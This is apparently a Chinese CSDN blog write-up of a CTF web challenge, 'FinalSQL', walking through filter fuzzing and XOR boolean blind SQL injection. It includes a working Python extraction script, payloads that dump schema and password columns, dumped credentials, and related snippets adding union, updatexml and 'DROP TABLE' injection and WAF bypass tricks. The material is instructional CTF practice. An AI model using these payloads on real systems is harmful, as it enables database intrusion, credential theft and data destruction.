[极客大挑战 2019]FinalSQL

最新推荐文章于 2025-03-20 10:18:04 发布
最新推荐文章于 2025-03-20 10:18:04 发布
阅读量1k 收藏 10
点赞数 7
CC 4.0 BY-SA版权
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fatherddd/article/details/143333925

首先进入题目正常思路是登录框存在sql注入,尝试万能密码,提示“你可别被我逮住了,臭弟弟”,应该是被过滤了,做一下FUZZ测试,发现过滤了空格,union等关键字

FUZZ字典已经上传到CSDN了

试了很长时间发现注入点不在这里,看见了题目提示,选择正确的神秘代码即可获得flag,出现了id的注入点,重新FUZZ一下,发现单双引号是没有被过滤的,and被过滤了or没有被过滤,输入单引号出现Error,输入1^0出现NO! Not this! Click others~~~,判断是数字型注入

数字型注入的原始查询语句:SELECT * FROM table_name WHERE id='$id'

使用异或操作来进行注入,1^1=0,0^0=0,1^0=1

我们用两个连续的单引号将查询语句的两个单引号给闭合id=''or(1^0)正确,id=''or(1^1)错误,存在数字型注入

id=''or(length(database())=4)  得到数据库的名字是四个字符

找到注入点注入类型接下来还是用脚本吧

import requests

import time

url="http://5d1aa51f-8d7a-44f9-b222-e46066ebb33a.node5.buuoj.cn:81/search.php?id="

flag=""

i=0

while True:

    i+=1

    begin=32  

    end=126  #ascii码表的可打印字符从32到126

    tmp=(begin+end) //2

    while begin<end:

        print(begin,tmp,end)

        time.sleep(0.1)   #buu的服务器还是停了0.1秒吧,防止429

        #爆库

        #payload="''or(ascii(substr(database(),%d,1))>%d)"%(i,tmp) #第一个%d对于的i,第二个%d对应的tmp,substr(database(),%d,1)获取数据库名称的第i个字符,然后通过ascii()函数将其转换为ASCII码,并与tmp比较。

        #爆表

        #payload="''or(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" % (i,tmp)

        #爆表

        #payload="''or(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)" % (i,tmp)

        #爆列

        payload="''or(ascii(substr((select(group_concat(password))from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i,tmp)

        r=requests.get(url+payload) #发送一个GET请求到之前定义的url,并将构造的payload附加到URL后面。

        if 'Click' in r.text: 

            begin = tmp+1

            tmp=(begin+end)//2

        else:

            end=tmp

            tmp=(begin+end)//2  #检查响应文本中是否包含"Click",如果包含,说明猜测的字符ASCII值太小,需要增加begin的值;否则,猜测的值太大,需要减小end的值。然后重新计算tmp

    flag+=chr(tmp)

    print(flag)

    if begin==32:

        break

#如果begin的值回到32,这意味着我们到达了字符范围的开始,这通常表示我们已经找到了完整的字符串,因此退出循环。

最后强调一下代码中,begin=tmp+1是必须的,从代码的可执行性角度来说如果 begin 被设置为 tmp,那么在下一个迭代中,tmp 将再次被设置为 (begin + end) // 2,这将导致 tmp 不变,从而陷入无限循环。

从二分法的角度来说当 if 'Click' in r.text: 条件为真时,意味着当前猜测的字符的 ASCII 值小于或等于 tmp。因此,为了继续查找更高的值,我们将 begin 设置为 tmp + 1,从而排除掉 tmp 这个值,并继续在更高的范围内搜索。

用户:root@localhost
数据库名:Click
表名:F1naI1y
字段名:id,username,password
    username:mygod,welcome,site,site,site,site,Syc,finally,flag
    password:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{7c62a615-ec40-44c3-9253-516366f3a908} 

表名:Flaaaaag
字段名:id,fl4gawsl

这题还是有点坑的,表Flaaaaag最像存在flag的表,字段fl4gawsl查了啥也没有

[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 784
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
[极客挑战 2019]FinalSQL 1
weixin_45577185的博客
10-12 502
开始试了试登录框,用sql注入,发现总是出现 后来发现url可能存在注入 通过bp,发现过滤了很多 输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’ 由于空格被过滤,用()代替。 import requests url = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php' flag = '' for i in range(1,250):# range.
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 891
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1537
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 559
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是神的脚本 step 1爆数据库 import requests u
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 650
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
CTF-Web-[极客挑战 2019]FinalSQL
归子莫的博客
05-03 1043
CTF-Web-[极客挑战 2019]FinalSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]FinalSQL 打开题目的实例 思路 SQl的题目,首先试...
Buuctf [极客挑战 2019]FinalSQL
最新发布
m_de_g的博客
03-20 1168
【代码】Buuctf [极客挑战 2019]FinalSQL
[极客挑战 2019]finalsql
03-15
<think>好的,我需要帮助用户找到关于“极客挑战2019”的最终SQL问题或解决方案。首先,我应该回想一下常见的SQL注入挑战类型,比如联合查询、布尔盲注、时间盲注等。用户提到的“final sql”可能是指比赛中的最后一道SQL题目,通常难度较高,可能涉及多种注入技巧的结合。 接下来,我需要检查现有的引用内容是否有相关的信息。查看提供的引用:[1]提到OOM问题,[2]是关于Kettle Excel的链接,[3]讨论Hadoop和YARN,[4]涉及SpringBoot多数据源配置。看起来这些引用中没有直接相关的SQL注入内容,因此可能需要基于一般知识来回答。 不过,通常这类比赛题可能涉及绕过过滤、利用报错注入或堆叠注入。例如,题目可能过滤了某些关键字如select、union,需要小写绕过或使用注释符。或者利用报错信息泄露数据,比如使用extractvalue或updatexml函数。 然后,我需要构造一个可能的解题思路。比如,题目可能存在一个登录表单,后端使用SQL查询验证用户。注入点可能在用户名或密码字段。假设后端语句是:SELECT * FROM users WHERE username='$user' AND password='$pass'。攻击者可以通过注入闭合单引号,插入恶意SQL代码。 例如,输入用户名为:' or 1=1 -- ,这可能导致绕过验证。但如果是更复杂的题目,可能需要获取数据库版本、表名、列名,最后提取flag。例如,使用联合查询:' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- 。 另外,可能需要处理WAF(Web应用防火墙)的过滤,比如用注释分隔符/**/绕过关键字检测,或者使用字符编码绕过。例如,用CHAR()函数代替字符串,或者使用十六进制编码。 此外,堆叠注入(Stacked Queries)允许执行多条SQL语句,可能被用来修改数据库结构或插入恶意数据。例如:'; DROP TABLE users; -- ,但实际比赛中可能更倾向于信息泄露而非破坏数据。 最后,需要确保回答符合用户的要求,即提供解决方案步骤,并生成相关问题。同时,注意使用正确的LaTeX格式和引用标注,虽然现有引用可能不直接相关,但需确认是否有可用的。</think>### 极客挑战 2019 Final SQL 解决方案 根据常见的CTF竞赛中SQL注入题型特点,极客挑战的最终SQL题目可能涉及多层过滤绕过或复杂注入技巧。以下为典型解题思路(假设题目为登录型注入场景): 1. **判断注入类型与过滤规则** 尝试输入单引号`'`触发报错,观察是否返回数据库错误信息。例如: ``` Username: ' Password: 123 ``` 若返回包含`MySQL syntax error`的提示,说明存在字符型注入,且可能存在部分关键字过滤[^1]。 2. **绕过过滤并构造Payload** 若常见关键字如`union`、`select`被过滤,可尝试以下方法: - **小写混合**:`UnIoN SeLeCt 1,2,3` - **内联注释**:`/*!union*/ select 1,2,3` - **双写绕过**:`ununionion selselectect 1,2,3` 3. **利用报错注入获取信息** 若无法通过联合查询获取数据,可使用MySQL报错函数: ```sql ' or updatexml(1,concat(0x7e,(select version())),1) -- ``` 该语句会触发XML解析错误并返回数据库版本信息[^2]。 4. **逐层提取数据** 通过嵌套查询逐步获取表名、列名和字段内容: ```sql ' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 -- ``` 假设获取到表名`flag_table`后,进一步查询字段: ```sql ' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag_table'),3 -- ``` 最终提取flag: ```sql ' union select 1,(select flag_column from flag_table limit 1),3 -- ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值